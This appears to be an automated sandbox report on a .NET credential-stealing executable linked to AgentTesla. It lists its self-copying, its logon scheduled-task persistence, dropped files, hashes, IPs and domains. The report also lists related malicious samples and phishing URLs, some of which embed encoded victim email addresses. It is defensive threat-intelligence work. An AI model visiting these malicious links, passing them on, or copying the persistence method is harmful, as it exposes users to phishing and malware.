Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:26:52	Task Scheduler	Run new task: jYRIGnZlROed path: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe
21:26:50	API Interceptor	1x Sleep call for process: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe modified
21:26:52	API Interceptor	14x Sleep call for process: powershell.exe modified
21:26:53	API Interceptor	9553988x Sleep call for process: MSBuild.exe modified
21:26:53	API Interceptor	1x Sleep call for process: jYRIGnZlROed.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.26.13.205	https://worker-late-forest-e569.jmassell.workers.dev/	Get hash	malicious	HTMLPhisher	Browse
	z646s6yeP6w9bbWjXY.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	specification sheet.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	https://m.exactag.com/ai.aspx?tc=d9bc40b07205bbd26a23a8d2e6b6b4f9&url=//secureyouerinfos.com/fhffdgg/sdssasas/mygsi/Y2FybGEuZ2luZXJAYXhhY3Rvci5jb20=	Get hash	malicious	Fake Captcha, HTMLPhisher	Browse
	SecuriteInfo.com.Win32.MalwareX-gen.170.29118.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	https://c8ke.com/auxxxxpdf	Get hash	malicious	Fake Captcha, HTMLPhisher	Browse
	SecuriteInfo.com.Trojan.PackedNET.2698.11030.8996.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	z16tTOiU5haycBoIv.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Fntzn.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	INQUIRY 2024-SP0006-B(01) INQ24-01220711.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
50.87.139.143	SHIPPING DOC.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	New order.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Quotation R2100131410.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	z92BankingDetails.exe	Get hash	malicious	AgentTesla	Browse
	z14Paymentslip.exe	Get hash	malicious	AgentTesla	Browse
	PO_0130717.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.RATX-gen.20501.5539.exe	Get hash	malicious	AgentTesla, zgRAT	Browse
	SecuriteInfo.com.Win32.PWSX-gen.27494.29811.exe	Get hash	malicious	AgentTesla, zgRAT	Browse
	SecuriteInfo.com.Trojan.MulDrop24.29879.27945.6957.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	jxWttyaGxM.exe	Get hash	malicious	PureLog Stealer, RHADAMANTHYS	Browse	192.229.211.108
	Tejasnetworks.com.webinar.msi	Get hash	malicious	Unknown	Browse	192.229.211.108
	Polaristek.msi	Get hash	malicious	Unknown	Browse	192.229.211.108
	comviva.com.webinar.msi	Get hash	malicious	Unknown	Browse	192.229.211.108
	file.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	192.229.211.108
	http://app-kartenabrechnung-l-larissa302261%5B.%5Dcodeanyapp%5B.%5Dcom	Get hash	malicious	Unknown	Browse	192.229.211.108
	file.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	192.229.211.108
	http://sarkerrentacars.com	Get hash	malicious	Unknown	Browse	192.229.211.108
	zt4lKwkzE6.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	192.229.211.108
	De5U75mSup.exe	Get hash	malicious	RedLine, SectopRAT	Browse	192.229.211.108
api.ipify.org	SecuriteInfo.com.Win64.Evo-gen.19254.19116.exe	Get hash	malicious	Luna Logger	Browse	104.26.12.205
	Lecture6.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	SecuriteInfo.com.Python.Stealer.1251.4514.5369.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	SecuriteInfo.com.Python.Stealer.1251.4514.5369.exe	Get hash	malicious	Python Stealer	Browse	104.26.12.205
	https://worker-late-forest-e569.jmassell.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	Ekstre.pdf.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	eSnWvjyy0f.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	PAYMENT SLIP.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	90971985 DRAFT.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Ziraat Bankasi Swift Mesaji.pdf.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
mail.elec-qatar.com	SHIPPING DOC.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.139.143
	New order.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.139.143
	Quotation R2100131410.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.139.143
	SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.139.143
	z92BankingDetails.exe	Get hash	malicious	AgentTesla	Browse	50.87.139.143
	z14Paymentslip.exe	Get hash	malicious	AgentTesla	Browse	50.87.139.143
	PO_0130717.exe	Get hash	malicious	AgentTesla	Browse	50.87.139.143
	SecuriteInfo.com.Win32.RATX-gen.20501.5539.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	50.87.139.143
	SecuriteInfo.com.Win32.PWSX-gen.27494.29811.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	50.87.139.143
	SecuriteInfo.com.Trojan.MulDrop24.29879.27945.6957.exe	Get hash	malicious	AgentTesla	Browse	50.87.139.143

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	1.1.1.1
	tJYmV684UD.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	104.26.4.15
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	1.1.1.1
	http://bullivantarabia.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	80 percent lower legal in colorado 50815.js	Get hash	malicious	Unknown	Browse	172.67.135.213
	80 percent lower legal in colorado 50815.js	Get hash	malicious	Unknown	Browse	104.21.26.95
	80 percent lower legal in colorado 50815.js	Get hash	malicious	Unknown	Browse	104.21.26.95
	80 percent lower legal in colorado 50815.js	Get hash	malicious	Unknown	Browse	104.21.73.120
	https://cdn.discordapp.com/attachments/1103880362347728966/1173825851121471628/WuqueID_2.2.msi?ex=65e69083&is=65d41b83&hm=ca02fcdde083740db41bbb41c5713bf277b51639f2793ea4e9b12a6ef64137df&	Get hash	malicious	Unknown	Browse	162.159.133.233
	ZT8OUnuIjX.exe	Get hash	malicious	Xehook Stealer	Browse	172.67.177.174
UNIFIEDLAYER-AS-1US	http://bullivantarabia.com	Get hash	malicious	Unknown	Browse	192.185.107.115
	cJVeMuYr6y.exe	Get hash	malicious	lgoogLoader	Browse	162.144.32.209
	cJVeMuYr6y.exe	Get hash	malicious	Unknown	Browse	162.144.32.209
	1AIemYSAZy.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc	Browse	50.87.178.128
	https://tracker.club-os.com/campaign/click?99559ms99559gId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=https://blicblac%25E3%2580%2582com%2F#0xahbWFydGluLmpvbmVzQGNhLnZ1??1qlc86&byqbjkql%2FOvCobOHOpnLAboDm%2F1FFaDncpbagduZbrKi7QbrDUoJtP%2F%2FbWFydGluLmpvbmVzQGNhLnZ1&https://instagram.com	Get hash	malicious	Fake Captcha	Browse	192.185.92.186
	http://email.robly.com/ls/click?upn=IdEuq0w5NGjcvp67fJm0Fjx7zI0UoacAvfuhX8IXMfi-2FBcyVFfNBAnRRYn3xO-2B1CJBL1_x1qKbjhEBXTMhgFeszlbTPAP7pso9-2FxqCAo9mujVNdxRC-2Fe6szeUW2wUpsJPamXtYEX5TxNxvCL8y7P57m0ckeV4eInxu3K8zf4ZJir3swUgmhxHZ4ueQr8HlG-2FmusQJH6y7p25ps7Tk6J5qNmOony1meVnHS6SWYINya9roE9W5a8qQtJPhUrtwHjPNNr8-2FRq8ri-2Fd5oj6InCgVt40NRVo7kVkD4rXqnd5qh4hVxKxbkv-2B-2Bg5grednXpzEJrVoppO7kdIBlpx5FtxXkVy5jroHsBNlwPLvY7zHyi82KhBukRiMiFN-2Bq8Y5MIpQ3tDOtgM9smS8EBnUo-2BNczWmfSC7A0LEM5yvlMpWf2qtqc4I7FL0Pb-2FOBoG7nzLMuVBmfOyvltwMiXHcvatoR9WpKWTWbswWnOInmA3qfQw2YmDZYZTRlsjGJ1yVr4dcvvE98tzz8ObIb6wBOg-2BtttMS8VRCu3mc-2FvYkvjr5dNSCoVNCXZ0NX-2BlVkto2ZltzhjEciS#doc~mstewart@dsi.us	Get hash	malicious	Unknown	Browse	50.116.112.104
	SecuriteInfo.com.W64.KryptoCibule.A.gen.Eldorado.15028.11808.exe	Get hash	malicious	XWorm	Browse	162.144.32.209
	https://m.exactag.com/ai.aspx?tc=d9bc40b07205bbd26a23a8d2e6b6b4f9&url=//secureyouerinfos.com/fhffdgg/sdssasas/silveroakins/bWF0dG1AcmR2Y29ycC5jb20=	Get hash	malicious	HTMLPhisher	Browse	192.185.108.1
	cotizaci#U00f3n1345.exe	Get hash	malicious	AgentTesla	Browse	162.144.32.209
	662891928.vbs	Get hash	malicious	XWorm	Browse	192.232.216.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	80 percent lower legal in colorado 50815.js	Get hash	malicious	Unknown	Browse	104.26.13.205
	80 percent lower legal in colorado 50815.js	Get hash	malicious	Unknown	Browse	104.26.13.205
	80 percent lower legal in colorado 50815.js	Get hash	malicious	Unknown	Browse	104.26.13.205
	80 percent lower legal in colorado 50815.js	Get hash	malicious	Unknown	Browse	104.26.13.205
	Tejasnetworks.com.webinar.msi	Get hash	malicious	Unknown	Browse	104.26.13.205
	Polaristek.msi	Get hash	malicious	Unknown	Browse	104.26.13.205
	comviva.com.webinar.msi	Get hash	malicious	Unknown	Browse	104.26.13.205
	cJVeMuYr6y.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	SecuriteInfo.com.Win64.HacktoolX-gen.24668.10031.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	SecuriteInfo.com.Win64.HacktoolX-gen.24668.10031.exe	Get hash	malicious	Unknown	Browse	104.26.13.205

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2056
Entropy (8bit):	5.342567089024067
Encrypted:	false
SSDEEP:	48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHKHxvj:iqlYqh3ou0aymsqwtI6eqzqqxwqRb
MD5:	83A6E29FD802325CCCB720870B60C618
SHA1:	4CD8AC6CA2659E4E32D1B27A8A4E77ABF980EE43
SHA-256:	A81A5B984180553C06E7C9CAE0BAF7E195950801F493996F48FA59F1ACC135B2
SHA-512:	69CC81145ACCA3D5C154D3A11396C2AFAEC4135662A82124EA249817BE7066D782DE2C79FE985E23F32F9709C144E2C513C727CFD1A88D677F34EB25E868B560
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jYRIGnZlROed.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2056
Entropy (8bit):	5.342567089024067
Encrypted:	false
SSDEEP:	48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHKHxvj:iqlYqh3ou0aymsqwtI6eqzqqxwqRb
MD5:	83A6E29FD802325CCCB720870B60C618
SHA1:	4CD8AC6CA2659E4E32D1B27A8A4E77ABF980EE43
SHA-256:	A81A5B984180553C06E7C9CAE0BAF7E195950801F493996F48FA59F1ACC135B2
SHA-512:	69CC81145ACCA3D5C154D3A11396C2AFAEC4135662A82124EA249817BE7066D782DE2C79FE985E23F32F9709C144E2C513C727CFD1A88D677F34EB25E868B560
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379460230152629
Encrypted:	false
SSDEEP:	48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YPUyus:fLHyIFKL3IZ2KRH9OugQs
MD5:	D951BCD234F0E41C2E1282F2D92650E3
SHA1:	5116D690A37C280737C348ECC2EFC02DE8C517C9
SHA-256:	3E840928EC1CEB87110E9BD98F08738621389E2575E32954A6B01B8F4DCE441C
SHA-512:	F37E142A1CB2C6D00C7E8F13DE81D7110A59FD1CC2F764BCAB46C97D2C99871C497422E545B2D997999DA70D755CFCED7B1D49AFBF907AF0660FD60C3E64382E
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_faant0e2.i41.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jyfasj0t.5qf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_siwyqxrq.ihk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y4n1cbr0.3o0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp919E.tmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1578
Entropy (8bit):	5.114932825977826
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaAJxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTp/v
MD5:	54652743F8AF3C8850DFC5D1B17A25F3
SHA1:	B35BEA435DB0AA7D3C5400AECD4E230215CC34A8
SHA-256:	0548AF62515374ACF317E54F58541670243342C85C771BE8D291BB94990850C6
SHA-512:	47B210FAD4A5C279BF9D7A82019BBB7B92FB41ED8BE579683813F90F400DF2389F9AF9B70C54191680F103C4D57809F34FB14A752D9D34701287645E0AD1F573
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmp9C4C.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1578
Entropy (8bit):	5.114932825977826
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaAJxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTp/v
MD5:	54652743F8AF3C8850DFC5D1B17A25F3
SHA1:	B35BEA435DB0AA7D3C5400AECD4E230215CC34A8
SHA-256:	0548AF62515374ACF317E54F58541670243342C85C771BE8D291BB94990850C6
SHA-512:	47B210FAD4A5C279BF9D7A82019BBB7B92FB41ED8BE579683813F90F400DF2389F9AF9B70C54191680F103C4D57809F34FB14A752D9D34701287645E0AD1F573
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	791560
Entropy (8bit):	7.903473670480701
Encrypted:	false
SSDEEP:	12288:rcZoYXRFbxfO0M+0GDyrT2n9TZyjfqhA1L2ncwZLhS6kdYU5G2g+NTMHF6wNrcwQ:gZoSRFNfO0MDeZ2CAscwEYUXmlP9/Xs
MD5:	6E7DF9FAE35366F13F6D83E037321608
SHA1:	1A3231720688F17AD0ED86C633FF02A9777B5753
SHA-256:	232DDA5F15F635E041AFCE6E34F17BA284380475A14232E85856065BDD78F0BE
SHA-512:	7D8450BB2687B4ECD267A84E2696CABE0EBB5872CC509F95C0000744DA9864043258CFCD20EF84D0E53BACBF025EEF58FE8192D66C69F66687519E3D61CFF230
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29% Antivirus: Virustotal, Detection: 42%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>q.e..............0.............N.... ........@.. .......................@............@.....................................W........................6... ....................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................0.......H........<..........C...P....X..........................................z...Y...?....7.............f.q.....:..@...p!~..-e..O&\|..w9...IA....9w.......'d.<..x!...'.9.Xy...H....P...f...Ss.s48r.V...H....9......H.I_f.f..0....v6.1.."......C.YC..^.&/...\|Pd[pq\s...=...@...I8...Ct.+yo.>8....{.,.v*.....Eu..@._5.4.l.(.<....0..Xe... ........:l.@....9....A...l.5i...............j(....#n.E..c.a....[.i\|.........4.M.8.]...\u..w..6....,.y[4...$/.}..n.?...7.f...#WP.H..

C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.903473670480701
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
File size:	791'560 bytes
MD5:	6e7df9fae35366f13f6d83e037321608
SHA1:	1a3231720688f17ad0ed86c633ff02a9777b5753
SHA256:	232dda5f15f635e041afce6e34f17ba284380475a14232e85856065bdd78f0be
SHA512:	7d8450bb2687b4ecd267a84e2696cabe0ebb5872cc509f95c0000744da9864043258cfcd20ef84d0e53bacbf025eef58fe8192d66c69f66687519e3d61cff230
SSDEEP:	12288:rcZoYXRFbxfO0M+0GDyrT2n9TZyjfqhA1L2ncwZLhS6kdYU5G2g+NTMHF6wNrcwQ:gZoSRFNfO0MDeZ2CAscwEYUXmlP9/Xs
TLSH:	83F401993250B19FC817CEB38A981C34EA307967631BC717A05725ACDA5EADACF141F3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>q.e..............0.............N.... ........@.. .......................@............@................................

File Icon


Icon Hash:	0f6371584c713b8e

Static PE Info

General

Entrypoint:	0x4be04e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x65DB713E [Sun Feb 25 16:56:30 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 00:00:00 08/11/2021 23:59:59
